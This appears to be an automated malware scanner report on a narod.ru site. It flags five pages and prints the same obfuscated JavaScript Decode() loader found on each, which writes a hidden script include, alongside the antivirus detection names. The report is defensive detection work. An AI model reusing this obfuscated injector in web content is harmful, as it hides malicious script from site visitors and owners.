Malware Scanner report for zirkindnw4.narod.ru

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://zirkindnw4.narod.ru/melodyne-rusifikator.html	200 OK Content-Length: 9912 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.355156036541661	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/abnl/?adsdata=I6hhJTAzBsDJBIkRxhAzWldP;6VNWxVWmlKCI8HJ^kl2UrgEPVDTJPB25Ojk0sHq!9I!azWEHd7ZP0F1bBt3BStiuqF36zxcM!v33cv0kU4EO;MdkLqxui14b^e^JHEGQQGOl;Z9cEuhuRza1fxGFvTkRyXa0^w500uAs72ShdJIGNIOVUbxMrL4N8lkiqaNdUoo	200 OK Content-Length: 2533 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/rusifikator-catalyst-control-center-2008.html	200 OK Content-Length: 10410 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.794307653906134	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/abnl/?adsdata=VfLTKjL2isSNsTvIrksttRlMO1igEcnJz^I4vzMHrKJiLmTh7qURDNyaQrfPGSxjc!A;p6Vv31ROBxpYvCt2FQPnh^QbqmzVBTmIw68lpuYeZVMmbk0FsNvyMlYdIQRYjyXJjveLYFS3neV9Q9HHm7x;wT2zZub4dOB^ZPYN2HK;QYF^bLSbk4pSvRtY;woo	200 OK Content-Length: 2501 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/drayvera-dlya-model-pk-750mj-skachat-besplatno-i-bez-registracii.html	200 OK Content-Length: 10690 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.650186279609251	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/abnl/?adsdata=bevciNASIyLjgpHql8A^Q5;vzEn;gHVp7g6!p2ein0K0aN!rPmC46jfmNV;DhzIzwH^9W9ulWSX4g5GfBInciGg3jO2hX^C4VxNn1qtmMaT0sCauYNwOG!RukTQuatl12PPbn3DxE75VNZBQHu;5YyKLOCBWTD9nBdsJmHW8syhp0819FekbDe2eU6;RgHPKpwoo	200 OK Content-Length: 2533 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/skachat-proshivki-dlya-nec-dvd-rw-nd-3550a-ata-device.html	200 OK Content-Length: 9781 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.527224261200587	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/abnl/?adsdata=wvJGjz;n3NsChyJ7TJ^0ekKKUuYxw7SPNHBeV!kryc0uHvppCK2!dvPS0Eu9Hhfz!q!tYAgWhQujKTYInTPPy2NlxGAvdZdv^g2t6KC!QZqnhhxuqlW7mqPg9eRaxzgKaxX5Diby0TnUJ1m1w6VnS46rwsj6hxOe;ZXj26btiKuYyUE;N3!IpfqOk^I;AGYo	200 OK Content-Length: 2505 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/rusifikator-dlya-mor-utopiya.html	200 OK Content-Length: 10375 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!102!105!108!101!115!46!106!115!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.304396748217201	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://zirkindnw4.narod.ru/abnl/?adsdata=!PJcIW3UDRRBUM3VqUurMG33A75Cq5RXJghs2jQFlDzPTPN7GzQ0JrRz7^ZzVcXLiXxTgiJE^39m7j7yT0YNmBjv0XuD5WyYGX1y3;X4IwK6LmAKZkH^uYQ7JJIYixG0auVjfmnLFavqll6IY7nshFq54^M6A0A;NTKup1HGPU3;dkZRSe9wcNrzjEBz230o	200 OK Content-Length: 2517 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: zirkindnw4.narod.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: zirkindnw4.narod.ru
Referer: http://www.google.com/search?q=zirkindnw4.narod.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=zirkindnw4.narod.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://zirkindnw4.narod.ru/

Result: zirkindnw4.narod.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for zirkindnw4.narod.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools